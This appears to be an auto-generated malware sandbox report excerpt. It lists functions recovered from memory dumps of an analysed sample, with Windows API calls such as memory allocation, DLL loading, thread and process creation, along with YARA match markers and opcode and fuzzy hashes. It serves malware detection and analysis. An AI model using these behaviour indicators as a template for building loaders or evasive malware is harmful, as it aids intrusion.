NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00082D11,00002000,00003000,00000004), ref: 000983C9

Memory Dump Source

Source File: 00000008.00000002.2370481869.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction ID: 40387beaf1419a180c31e2cff737e2f724b9fe9c60f55009042e5faa2de09132
Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction Fuzzy Hash: 76F015B2200208ABCB14DF89CC81EEB77ADAF88750F118148BE0897341CA30F810CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 025700C4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 025700CF

Memory Dump Source

Source File: 00000008.00000002.2371423865.0000000002560000.00000040.00000001.sdmp, Offset: 02550000, based on PE: true

Associated: 00000008.00000002.2371416635.0000000002550000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371526889.0000000002640000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371534575.0000000002650000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371542865.0000000002654000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371549334.0000000002657000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371556151.0000000002660000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371600750.00000000026C0000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846

Uniqueness

Uniqueness Score: -1.00%

Function 025707AC, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 025707B7

Memory Dump Source

Source File: 00000008.00000002.2371423865.0000000002560000.00000040.00000001.sdmp, Offset: 02550000, based on PE: true

Associated: 00000008.00000002.2371416635.0000000002550000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371526889.0000000002640000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371534575.0000000002650000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371542865.0000000002654000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371549334.0000000002657000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371556151.0000000002660000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371600750.00000000026C0000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487

Uniqueness

Uniqueness Score: -1.00%

Function 0256FAD0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0256FADB

Memory Dump Source

Source File: 00000008.00000002.2371423865.0000000002560000.00000040.00000001.sdmp, Offset: 02550000, based on PE: true

Associated: 00000008.00000002.2371416635.0000000002550000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371526889.0000000002640000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371534575.0000000002650000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371542865.0000000002654000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371549334.0000000002657000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371556151.0000000002660000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371600750.00000000026C0000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986

Uniqueness

Uniqueness Score: -1.00%

Function 0256FAE8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0256FAF3

Memory Dump Source

Source File: 00000008.00000002.2371423865.0000000002560000.00000040.00000001.sdmp, Offset: 02550000, based on PE: true

Associated: 00000008.00000002.2371416635.0000000002550000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371526889.0000000002640000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371534575.0000000002650000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371542865.0000000002654000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371549334.0000000002657000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371556151.0000000002660000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371600750.00000000026C0000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456

Uniqueness

Uniqueness Score: -1.00%

Function 0256FAB8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0256FAC3

Memory Dump Source

Source File: 00000008.00000002.2371423865.0000000002560000.00000040.00000001.sdmp, Offset: 02550000, based on PE: true

Associated: 00000008.00000002.2371416635.0000000002550000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371526889.0000000002640000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371534575.0000000002650000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371542865.0000000002654000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371549334.0000000002657000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371556151.0000000002660000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371600750.00000000026C0000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
Instruction ID: c22cab920426f99211259bec297b66dc94c7f77789dfa39603ac798b5fdced38
Opcode Fuzzy Hash: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
Instruction Fuzzy Hash: 66B01272100544C7E349B714D906B8B7210FF80F00F00893AA00782861DB389A2CE996

Uniqueness

Uniqueness Score: -1.00%

Function 0256FB50, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0256FB5B

Memory Dump Source

Source File: 00000008.00000002.2371423865.0000000002560000.00000040.00000001.sdmp, Offset: 02550000, based on PE: true

Associated: 00000008.00000002.2371416635.0000000002550000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371526889.0000000002640000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371534575.0000000002650000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371542865.0000000002654000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371549334.0000000002657000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371556151.0000000002660000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371600750.00000000026C0000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
Instruction ID: 24e1bc86294fbd7a1654c33a96a754a721993c998c3fcb69f8e89524a52cb594
Opcode Fuzzy Hash: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
Instruction Fuzzy Hash: 54B01272201544C7E3099B14D906F8B7210FB90F00F00893EE00782851DB38D92CE447

Uniqueness

Uniqueness Score: -1.00%

Function 0256FB68, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0256FB73

Memory Dump Source

Source File: 00000008.00000002.2371423865.0000000002560000.00000040.00000001.sdmp, Offset: 02550000, based on PE: true

Associated: 00000008.00000002.2371416635.0000000002550000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371526889.0000000002640000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371534575.0000000002650000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371542865.0000000002654000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371549334.0000000002657000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371556151.0000000002660000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371600750.00000000026C0000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446

Uniqueness

Uniqueness Score: -1.00%

Function 0256FBB8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0256FBC3

Memory Dump Source

Source File: 00000008.00000002.2371423865.0000000002560000.00000040.00000001.sdmp, Offset: 02550000, based on PE: true

Associated: 00000008.00000002.2371416635.0000000002550000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371526889.0000000002640000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371534575.0000000002650000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371542865.0000000002654000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371549334.0000000002657000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371556151.0000000002660000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371600750.00000000026C0000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A

Uniqueness

Uniqueness Score: -1.00%

Function 0256F900, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0256F90E

Memory Dump Source

Source File: 00000008.00000002.2371423865.0000000002560000.00000040.00000001.sdmp, Offset: 02550000, based on PE: true

Associated: 00000008.00000002.2371416635.0000000002550000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371526889.0000000002640000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371534575.0000000002650000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371542865.0000000002654000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371549334.0000000002657000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371556151.0000000002660000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371600750.00000000026C0000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587

Uniqueness

Uniqueness Score: -1.00%

Function 0256F9F0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0256F9FB

Memory Dump Source

Source File: 00000008.00000002.2371423865.0000000002560000.00000040.00000001.sdmp, Offset: 02550000, based on PE: true

Associated: 00000008.00000002.2371416635.0000000002550000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371526889.0000000002640000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371534575.0000000002650000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371542865.0000000002654000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371549334.0000000002657000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371556151.0000000002660000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371600750.00000000026C0000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A

Uniqueness

Uniqueness Score: -1.00%

Function 0256FED0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0256FEDB

Memory Dump Source

Source File: 00000008.00000002.2371423865.0000000002560000.00000040.00000001.sdmp, Offset: 02550000, based on PE: true

Associated: 00000008.00000002.2371416635.0000000002550000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371526889.0000000002640000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371534575.0000000002650000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371542865.0000000002654000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371549334.0000000002657000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371556151.0000000002660000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371600750.00000000026C0000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A

Uniqueness

Uniqueness Score: -1.00%

Function 0256FFB4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0256FFBF

Memory Dump Source

Source File: 00000008.00000002.2371423865.0000000002560000.00000040.00000001.sdmp, Offset: 02550000, based on PE: true

Associated: 00000008.00000002.2371416635.0000000002550000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371526889.0000000002640000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371534575.0000000002650000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371542865.0000000002654000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371549334.0000000002657000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371556151.0000000002660000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371600750.00000000026C0000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A

Uniqueness

Uniqueness Score: -1.00%

Function 0256FC60, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0256FC6B

Memory Dump Source

Source File: 00000008.00000002.2371423865.0000000002560000.00000040.00000001.sdmp, Offset: 02550000, based on PE: true

Associated: 00000008.00000002.2371416635.0000000002550000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371526889.0000000002640000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371534575.0000000002650000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371542865.0000000002654000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371549334.0000000002657000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371556151.0000000002660000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371600750.00000000026C0000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A

Uniqueness

Uniqueness Score: -1.00%

Function 0256FDC0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0256FDCB

Memory Dump Source

Source File: 00000008.00000002.2371423865.0000000002560000.00000040.00000001.sdmp, Offset: 02550000, based on PE: true

Associated: 00000008.00000002.2371416635.0000000002550000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371526889.0000000002640000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371534575.0000000002650000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371542865.0000000002654000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371549334.0000000002657000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371556151.0000000002660000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371600750.00000000026C0000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486

Uniqueness

Uniqueness Score: -1.00%

Function 0256FD8C, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0256FD9A

Memory Dump Source

Source File: 00000008.00000002.2371423865.0000000002560000.00000040.00000001.sdmp, Offset: 02550000, based on PE: true

Associated: 00000008.00000002.2371416635.0000000002550000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371526889.0000000002640000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371534575.0000000002650000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371542865.0000000002654000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371549334.0000000002657000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371556151.0000000002660000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371600750.00000000026C0000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686

Uniqueness

Uniqueness Score: -1.00%

Function 00096ED0, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 00096F78

Strings

wininet.dll, xrefs: 00096F2E, 00096F37
net.dll, xrefs: 00096F41, 00096FC7, 00096F9F, 00096FAB, 00096FD3

Memory Dump Source

Source File: 00000008.00000002.2370481869.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: 819bee04a7e7d6e057f1c6dcf151a008b2b0b8b0de6c4166cc31338411b0e2c8
Instruction ID: 5db4347087e42a734f46b48b741abacaa776633d3b9bc2b08fdfc74665a15ccb
Opcode Fuzzy Hash: 819bee04a7e7d6e057f1c6dcf151a008b2b0b8b0de6c4166cc31338411b0e2c8
Instruction Fuzzy Hash: 2C318FB1601704ABCB25DF68D8B1FA7B7F8BB48700F00842DF61A9B242D731A945DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00096EC6, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 82sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 00096F78

Strings

wininet.dll, xrefs: 00096F2E, 00096F37
net.dll, xrefs: 00096F41, 00096F9F, 00096FAB

Memory Dump Source

Source File: 00000008.00000002.2370481869.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: 286d9b1285ea19e145054a6e57d500de3367c4c40d47c2cf9c993ce3493d511b
Instruction ID: 3db838d370003cdd83d35d8174f03e9938fe8cf7a72901fcb79833a7b2f5c73f
Opcode Fuzzy Hash: 286d9b1285ea19e145054a6e57d500de3367c4c40d47c2cf9c993ce3493d511b
Instruction Fuzzy Hash: 4021B6B1601300ABDB21DF68DCA1FABBBB4FF48700F10842DF5199B242D371A445DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00096FF3, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 55threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0008CCC0,?,?), ref: 0009703C

Strings

net.dll, xrefs: 00096F9F, 00096FAB

Memory Dump Source

Source File: 00000008.00000002.2370481869.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: CreateThread
String ID: net.dll
API String ID: 2422867632-2431746569
Opcode ID: 1124d17563cc182dd7add0476d5aeec32f42aa80a321f02dba2ee3572b93fb9c
Instruction ID: 3e2e6d30170e76a1fe4f68f29e8024ceec684c525e61e9a3e086d096a1637e14
Opcode Fuzzy Hash: 1124d17563cc182dd7add0476d5aeec32f42aa80a321f02dba2ee3572b93fb9c
Instruction Fuzzy Hash: 730147732412007ADB319A98DC22FE773A8DBC4720F10406EF61E9B182E772B94597A1

Uniqueness

Uniqueness Score: -1.00%

Function 000984B2, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 28memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00083B93), ref: 000984ED

Strings

.z`, xrefs: 000984DC, 000984E8

Memory Dump Source

Source File: 00000008.00000002.2370481869.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 46e86b664081759a4809455eb36c33255a52f21591b1931af0b913cd27280c6f
Instruction ID: 4b63bcf631478225a830568ce9cb8088a66ab7088cb19e9f3a846f5056668c06
Opcode Fuzzy Hash: 46e86b664081759a4809455eb36c33255a52f21591b1931af0b913cd27280c6f
Instruction Fuzzy Hash: 47E092712402046BDB14DFA5CC44ED73799EF88350F158149FD0C9B351D531E911CAF0

Uniqueness

Uniqueness Score: -1.00%

Function 000984C0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00083B93), ref: 000984ED

Strings

.z`, xrefs: 000984DC, 000984E8

Memory Dump Source

Source File: 00000008.00000002.2370481869.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction ID: 328bf0f62db3d8abc1ce4827b1d9d951b4c8beb809e8fbe3683c68d47cc07640
Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction Fuzzy Hash: 80E01AB12002046BDB14DF59CC45EE777ACAF88750F018554BA0857342CA30E9108AF0

Uniqueness

Uniqueness Score: -1.00%

Function 00087260, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 000872BA
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 000872DB

Memory Dump Source

Source File: 00000008.00000002.2370481869.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 53e5322b62eb909e761c59486e91cb807ee3ea7040c4705f1c47c4bf58bd69dc
Instruction ID: 510fcc912754c5bf7b46505b14e642f0217a5f1fce34de7c2b8a5746be955fa1
Opcode Fuzzy Hash: 53e5322b62eb909e761c59486e91cb807ee3ea7040c4705f1c47c4bf58bd69dc
Instruction Fuzzy Hash: 8001A731A802287AEB20B6949C43FFF776C6B00B50F140119FF04BA1C2E694690647F5

Uniqueness

Uniqueness Score: -1.00%

Function 00089B10, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00089B82

Memory Dump Source

Source File: 00000008.00000002.2370481869.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
Instruction ID: cf5d96cfa9e9af59e5533b7ad4aec78180b733f8f6a1309060bc0b03ea090bf5
Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
Instruction Fuzzy Hash: FB011EB5E4020DABDF10EBE4ED42FEDB3B8AB54308F0441A5E90897242F631EB14DB91

Uniqueness

Uniqueness Score: -1.00%

Function 0009852D, Relevance: 1.5, APIs: 1, Instructions: 43processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00098584

Memory Dump Source

Source File: 00000008.00000002.2370481869.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 2d47f2dfe8e3a19b62673b65d27fcc9ccf7019d0fe1f3e8623b589d471756cb0
Instruction ID: 43aa7868e32f2fb9aa7b056f9285c42e5d3e9d30290c101427c793047a8a9aa7
Opcode Fuzzy Hash: 2d47f2dfe8e3a19b62673b65d27fcc9ccf7019d0fe1f3e8623b589d471756cb0
Instruction Fuzzy Hash: 8B01AFB2210108BBCB54DF89DC80EEB77ADAF8C754F158258BA0D97241CA30E851CBA4

Uniqueness

